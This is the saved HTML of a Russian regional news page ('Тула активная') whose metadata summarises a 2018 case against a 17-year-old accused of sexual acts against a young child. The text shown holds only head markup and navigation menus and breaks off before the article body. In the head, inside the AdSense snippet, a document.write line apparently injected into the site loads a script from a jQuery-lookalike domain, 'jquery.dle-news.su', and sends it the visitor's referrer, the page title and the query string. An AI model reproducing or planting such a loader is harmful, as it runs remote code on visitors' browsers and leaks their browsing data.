﻿<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="ru-RU" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
<title>В Ясногорске 17-летнего подростка будут судить за педофилию | Тула активная</title>
    <meta name="viewport" content="wight-device-width, initial-scale=1.0">
    <meta charset="UTF-8" />
    <meta name="yandex-verification" content="ec67cb81bd85930b" />
	<meta name="google-site-verification" content="eUR2B7DNy4TMF5mALHfACgGFS3cOzhX18MjocKbNWPQ" />
<title>Тула активная</title>
<meta name="keywords" content="тула активная, тульские новости, новости в туле сегодня, события в туле, криминал, происшествия">
<meta name="description" content="В Ясногорском районе 17-летний подросток обвиняется в совершении преступления против половой неприкосновенности малолетнего. В ходе следствия установлено, что летом 2017 года обвиняемый в подвале бывшего детского сада совершил в отношении" ><link rel="pingback" href="http://tulactive.ru/xmlrpc.php" />
    <meta property="og:image" content="http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg" />
<!-- This site is optimized with the Yoast SEO plugin v7.9.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://tulactive.ru/news/109272" />
<meta property="og:locale" content="ru_RU" />
<meta property="og:type" content="article" />
<meta property="og:title" content="В Ясногорске 17-летнего подростка будут судить за педофилию | Тула активная" />
<meta property="og:description" content="В Ясногорском районе 17-летний подросток обвиняется в совершении преступления против половой неприкосновенности малолетнего. В ходе следствия установлено, что летом 2017 года обвиняемый в подвале бывшего детского сада совершил в отношении малолетнего действия сексуального характера. Было возбуждено уголовное дело по п. «б» ч. 4 ст. 132 УК РФ. Обвиняемый заключён под стражу. Как сообщили в прокуратуре &hellip;" />
<meta property="og:url" content="http://tulactive.ru/news/109272" />
<meta property="og:site_name" content="Тула активная" />
<meta property="article:tag" content="дети" />
<meta property="article:tag" content="криминал" />
<meta property="article:tag" content="педофилы" />
<meta property="article:tag" content="прокуратура" />
<meta property="article:tag" content="суд" />
<meta property="article:tag" content="Ясногорск" />
<meta property="article:section" content="Общество" />
<meta property="article:published_time" content="2018-08-09T15:52:38+00:00" />
<meta property="article:modified_time" content="2018-08-09T15:36:56+00:00" />
<meta property="og:updated_time" content="2018-08-09T15:36:56+00:00" />
<meta property="og:image" content="http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg" />
<meta property="og:image:width" content="800" />
<meta property="og:image:height" content="600" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="В Ясногорском районе 17-летний подросток обвиняется в совершении преступления против половой неприкосновенности малолетнего. В ходе следствия установлено, что летом 2017 года обвиняемый в подвале бывшего детского сада совершил в отношении малолетнего действия сексуального характера. Было возбуждено уголовное дело по п. «б» ч. 4 ст. 132 УК РФ. Обвиняемый заключён под стражу. Как сообщили в прокуратуре [&hellip;]" />
<meta name="twitter:title" content="В Ясногорске 17-летнего подростка будут судить за педофилию | Тула активная" />
<meta name="twitter:image" content="http://tulactive.ru/wp-content/uploads/2018/08/femida_1.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Тула активная &raquo; Лента" href="http://tulactive.ru/feed" />
<link rel="alternate" type="application/rss+xml" title="Тула активная &raquo; Лента комментариев" href="http://tulactive.ru/comments/feed" />
		<script type="text/javascript">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</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://tulactive.ru/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-lightbox-swipebox-css'  href='http://tulactive.ru/wp-content/plugins/responsive-lightbox/assets/swipebox/css/swipebox.css?ver=2.0.5' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://tulactive.ru/wp-includes/css/dashicons.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://tulactive.ru/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://tulactive.ru/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://tulactive.ru/wp-content/themes/Newspaper%207/style.css?ver=7.7' type='text/css' media='all' />
<script type='text/javascript' src='http://tulactive.ru/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://tulactive.ru/wp-includes/js/jquery/jquery-migrate.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://tulactive.ru/wp-content/plugins/responsive-lightbox/assets/swipebox/js/jquery.swipebox.js?ver=2.0.5'></script>
<script type='text/javascript' src='http://tulactive.ru/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.js?ver=4.9.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var rlArgs = {"script":"swipebox","selector":"lightbox","customEvents":"","activeGalleries":"1","animation":"1","hideCloseButtonOnMobile":"0","removeBarsOnMobile":"0","hideBars":"1","hideBarsDelay":"5000","videoMaxWidth":"1080","useSVG":"1","loopAtEnd":"0","woocommerce_gallery":"0","ajaxurl":"http:\/\/tulactive.ru\/wp-admin\/admin-ajax.php","nonce":"7dab234e37"};
/* ]]> */
</script>
<script type='text/javascript' src='http://tulactive.ru/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.0.5'></script>
<link rel='https://api.w.org/' href='http://tulactive.ru/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tulactive.ru/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tulactive.ru/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel='shortlink' href='https://wp.me/p5UCzH-sqs' />
<link rel="alternate" type="application/json+oembed" href="http://tulactive.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftulactive.ru%2Fnews%2F109272" />
<link rel="alternate" type="text/xml+oembed" href="http://tulactive.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftulactive.ru%2Fnews%2F109272&#038;format=xml" />

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://tulactive.ru/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><style type="text/css">.broken_link, a.broken_link {
	text-decoration: line-through;
}</style>
<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-58516938-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-58516938-1');
</script><link rel="icon" href="http://tulactive.ru/wp-content/uploads/2016/01/cropped-tulactive_log-32x32.jpg" sizes="32x32" />
<link rel="icon" href="http://tulactive.ru/wp-content/uploads/2016/01/cropped-tulactive_log-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://tulactive.ru/wp-content/uploads/2016/01/cropped-tulactive_log-180x180.jpg" />
<meta name="msapplication-TileImage" content="http://tulactive.ru/wp-content/uploads/2016/01/cropped-tulactive_log-270x270.jpg" />
<!-- ## NXS/OG ## --><!-- ## NXSOGTAGS ## --><!-- ## NXS/OG ## -->
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
document.write('<script type="application/javascript" src="//jquery.dle-news.su/JFrJVM?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'"><' + '/script>');
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3963937291186584",
          enable_page_level_ads: true
     });
</script>
</head>
<body>
        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/tulactive" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/tulactive" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://vk.com/tulactive" title="VKontakte">
                <i class="td-icon-font td-icon-vk"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-%d0%bc%d0%b5%d0%bd%d1%8e-1-container"><ul id="menu-%d0%bc%d0%b5%d0%bd%d1%8e-1" class="td-mobile-main-menu"><li id="menu-item-10" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first menu-item-10"><a href="http://tulactive.ru/">Главная</a></li>
<li id="menu-item-51784" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-51784"><a href="http://tulactive.ru/news">Новости<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-51806" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-51806"><a href="http://tulactive.ru/government">Власть<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-95897" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95897"><a href="http://tulactive.ru/government/tularegion">Правительство Тульской области</a></li>
		<li id="menu-item-95898" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95898"><a href="http://tulactive.ru/government/administration">Администрация Тулы</a></li>
		<li id="menu-item-95906" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95906"><a href="http://tulactive.ru/government/tulaoblduma">Тулоблдума</a></li>
		<li id="menu-item-95907" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95907"><a href="http://tulactive.ru/government/tulagorduma">Тулгордума</a></li>
	</ul>
</li>
	<li id="menu-item-95914" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-95914"><a href="http://tulactive.ru/services">Службы<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-95916" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95916"><a href="http://tulactive.ru/society/mchs">МЧС</a></li>
		<li id="menu-item-95915" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95915"><a href="http://tulactive.ru/society/mvd">МВД</a></li>
		<li id="menu-item-95917" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95917"><a href="http://tulactive.ru/society/prokuratura">Прокуратура</a></li>
		<li id="menu-item-95918" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95918"><a href="http://tulactive.ru/society/sledcom">Следственный комитет</a></li>
		<li id="menu-item-95919" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95919"><a href="http://tulactive.ru/society/fsb">ФСБ</a></li>
	</ul>
</li>
	<li id="menu-item-88075" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-88075"><a href="http://tulactive.ru/economics">Экономика</a></li>
	<li id="menu-item-51796" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51796"><a href="http://tulactive.ru/society">Общество</a></li>
	<li id="menu-item-72827" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-72827"><a href="http://tulactive.ru/criminal">Криминал</a></li>
	<li id="menu-item-51800" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51800"><a href="http://tulactive.ru/ecology">Среда</a></li>
	<li id="menu-item-51793" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-51793"><a href="http://tulactive.ru/culture">Культура<i class="td-icon-menu-right td-element-after"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-95908" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95908"><a href="http://tulactive.ru/culture/expositions">Выставки</a></li>
		<li id="menu-item-95909" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95909"><a href="http://tulactive.ru/culture/festivals">Фестивали</a></li>
		<li id="menu-item-95910" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95910"><a href="http://tulactive.ru/culture/konkurs">Конкурсы</a></li>
	</ul>
</li>
	<li id="menu-item-88077" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-88077"><a href="http://tulactive.ru/law">Законодательство</a></li>
</ul>
</li>
<li id="menu-item-67151" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-67151"><a href="http://tulactive.ru/localnews">Районы<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-94384" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94384"><a href="http://tulactive.ru/aleksin">Алексин</a></li>
	<li id="menu-item-94430" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94430"><a href="http://tulactive.ru/belev">Белёв</a></li>
	<li id="menu-item-94387" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94387"><a href="http://tulactive.ru/bogoroditsk">Богородицк</a></li>
	<li id="menu-item-94398" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94398"><a href="http://tulactive.ru/venev">Венёв</a></li>
	<li id="menu-item-94494" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94494"><a href="http://tulactive.ru/donskoy">Донской</a></li>
	<li id="menu-item-94423" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94423"><a href="http://tulactive.ru/dubna">Дубна</a></li>
	<li id="menu-item-94420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94420"><a href="http://tulactive.ru/efremov">Ефремов</a></li>
	<li id="menu-item-94407" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94407"><a href="http://tulactive.ru/kimovsk">Кимовск</a></li>
	<li id="menu-item-94411" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94411"><a href="http://tulactive.ru/kireevsk">Киреевск</a></li>
	<li id="menu-item-94392" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94392"><a href="http://tulactive.ru/novomoskovsk">Новомосковск</a></li>
	<li id="menu-item-94427" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94427"><a href="http://tulactive.ru/odoev">Одоев</a></li>
	<li id="menu-item-94404" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94404"><a href="http://tulactive.ru/plavsk">Плавск</a></li>
	<li id="menu-item-94395" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94395"><a href="http://tulactive.ru/suvorov">Суворов</a></li>
	<li id="menu-item-94414" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94414"><a href="http://tulactive.ru/uzlovaya">Узловая</a></li>
	<li id="menu-item-94491" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94491"><a href="http://tulactive.ru/chern">Чернь</a></li>
	<li id="menu-item-94417" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94417"><a href="http://tulactive.ru/schekino">Щёкино</a></li>
	<li id="menu-item-94402" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94402"><a href="http://tulactive.ru/yasnogorsk">Ясногорск</a></li>
</ul>
</li>
<li id="menu-item-79151" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-79151"><a href="http://tulactive.ru/ratings">Рейтинги</a></li>
<li id="menu-item-52057" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-52057"><a href="http://tulactive.ru/activism">Активизм<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-73496" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-73496"><a href="http://tulactive.ru/activism/control">Общественный контроль</a></li>
	<li id="menu-item-58372" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58372"><a href="http://tulactive.ru/activism/actions">Акции</a></li>
	<li id="menu-item-58370" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58370"><a href="http://tulactive.ru/activism/petitions">Петиции</a></li>
</ul>
</li>
<li id="menu-item-49347" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-49347"><a href="http://tulactive.ru/projects">Проекты<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-94944" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94944"><a href="http://tulactive.ru/reactor">Тула реактивная</a></li>
	<li id="menu-item-94945" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94945"><a href="http://tulactive.ru/heroic">Тула героическая</a></li>
	<li id="menu-item-94946" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-94946"><a href="http://tulactive.ru/radioactive">Тула радиоактивная</a></li>
</ul>
</li>
<li id="menu-item-93399" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-93399"><a href="http://tulactive.ru">Другое<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-51776" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51776"><a href="http://tulactive.ru/articles">Статьи</a></li>
	<li id="menu-item-51772" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51772"><a href="http://tulactive.ru/special">Спецматериалы</a></li>
	<li id="menu-item-51781" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51781"><a href="http://tulactive.ru/experts">Эксперты</a></li>
</ul>
</li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="http://tulactive.ru/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Поиск</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap" class="td-theme-wrap">
    
        <!--
Header style 5
-->

<div class="td-header-wrap td-header-style-5">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	<div class="menu-top-container"><ul id="menu-%d0%bc%d0%b5%d0%bd%d1%8e-2" class="top-header-menu"><li id="menu-item-56277" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-56277"><a href="http://tulactive.ru/djumin-pomogi">ДюминПомоги</a></li>
<li id="menu-item-70366" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-70366"><a href="http://tulactive.ru/districts">РайАдминистрация</a></li>
<li id="menu-item-94263" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94263"><a href="http://tulactive.ru/persons">Персоналии</a></li>
<li id="menu-item-94915" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94915"><a href="http://tulactive.ru/corruption">Коррупция</a></li>
<li id="menu-item-107730" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-107730"><a href="http://tulactive.ru/pensii-reform">Пенсионная реформа</a></li>
<li id="menu-item-107637" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-107637"><a href="http://tulactive.ru/suvorov-partizans">Суворовские &laquo;партизаны&raquo;</a></li>
<li id="menu-item-74721" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-74721"><a href="http://tulactive.ru/connecting">Обратная связь</a></li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/tulactive" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/tulactive" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://vk.com/tulactive" title="VKontakte">
                <i class="td-icon-font td-icon-vk"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap">
            <div class="td-container td-header-row td-header-main-menu black-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-menu">
                    <a class="td-main-logo" href="http://tulactive.ru/">
                <img src="http://tulactive.ru/wp-content/uploads/2017/11/logotip_tulactive.png" alt="Тула активная"/>
                <span class="td-visual-hidden">Тула активная</span>
            </a>
            </div>
    <div class="menu-%d0%bc%d0%b5%d0%bd%d1%8e-1-container"><ul id="menu-%d0%bc%d0%b5%d0%bd%d1%8e-3" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-10"><a href="http://tulactive.ru/">Главная</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-51784"><a href="http://tulactive.ru/news">Новости</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-51806"><a href="http://tulactive.ru/government">Власть</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95897"><a href="http://tulactive.ru/government/tularegion">Правительство Тульской области</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95898"><a href="http://tulactive.ru/government/administration">Администрация Тулы</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95906"><a href="http://tulactive.ru/government/tulaoblduma">Тулоблдума</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95907"><a href="http://tulactive.ru/government/tulagorduma">Тулгордума</a></li>
	</ul>
</li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-95914"><a href="http://tulactive.ru/services">Службы</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95916"><a href="http://tulactive.ru/society/mchs">МЧС</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95915"><a href="http://tulactive.ru/society/mvd">МВД</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95917"><a href="http://tulactive.ru/society/prokuratura">Прокуратура</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95918"><a href="http://tulactive.ru/society/sledcom">Следственный комитет</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95919"><a href="http://tulactive.ru/society/fsb">ФСБ</a></li>
	</ul>
</li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-88075"><a href="http://tulactive.ru/economics">Экономика</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-51796"><a href="http://tulactive.ru/society">Общество</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-72827"><a href="http://tulactive.ru/criminal">Криминал</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-51800"><a href="http://tulactive.ru/ecology">Среда</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-51793"><a href="http://tulactive.ru/culture">Культура</a>
	<ul class="sub-menu">
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95908"><a href="http://tulactive.ru/culture/expositions">Выставки</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95909"><a href="http://tulactive.ru/culture/festivals">Фестивали</a></li>
		<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-95910"><a href="http://tulactive.ru/culture/konkurs">Конкурсы</a></li>
	</ul>
</li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-88077"><a href="http://tulactive.ru/law">Законодательство</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-67151"><a href="http://tulactive.ru/localnews">Районы</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94384"><a href="http://tulactive.ru/aleksin">Алексин</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94430"><a href="http://tulactive.ru/belev">Белёв</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94387"><a href="http://tulactive.ru/bogoroditsk">Богородицк</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94398"><a href="http://tulactive.ru/venev">Венёв</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94494"><a href="http://tulactive.ru/donskoy">Донской</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94423"><a href="http://tulactive.ru/dubna">Дубна</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94420"><a href="http://tulactive.ru/efremov">Ефремов</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94407"><a href="http://tulactive.ru/kimovsk">Кимовск</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94411"><a href="http://tulactive.ru/kireevsk">Киреевск</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94392"><a href="http://tulactive.ru/novomoskovsk">Новомосковск</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94427"><a href="http://tulactive.ru/odoev">Одоев</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94404"><a href="http://tulactive.ru/plavsk">Плавск</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94395"><a href="http://tulactive.ru/suvorov">Суворов</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94414"><a href="http://tulactive.ru/uzlovaya">Узловая</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94491"><a href="http://tulactive.ru/chern">Чернь</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94417"><a href="http://tulactive.ru/schekino">Щёкино</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-94402"><a href="http://tulactive.ru/yasnogorsk">Ясногорск</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-79151"><a href="http://tulactive.ru/ratings">Рейтинги</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-52057"><a href="http://tulactive.ru/activism">Активизм</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-73496"><a href="http://tulactive.ru/activism/control">Общественный контроль</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-58372"><a href="http://tulactive.ru/activism/actions">Акции</a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-58370"><a href="http://tulactive.ru/activism/petitions">Петиции</a></li>
</ul>
</li>
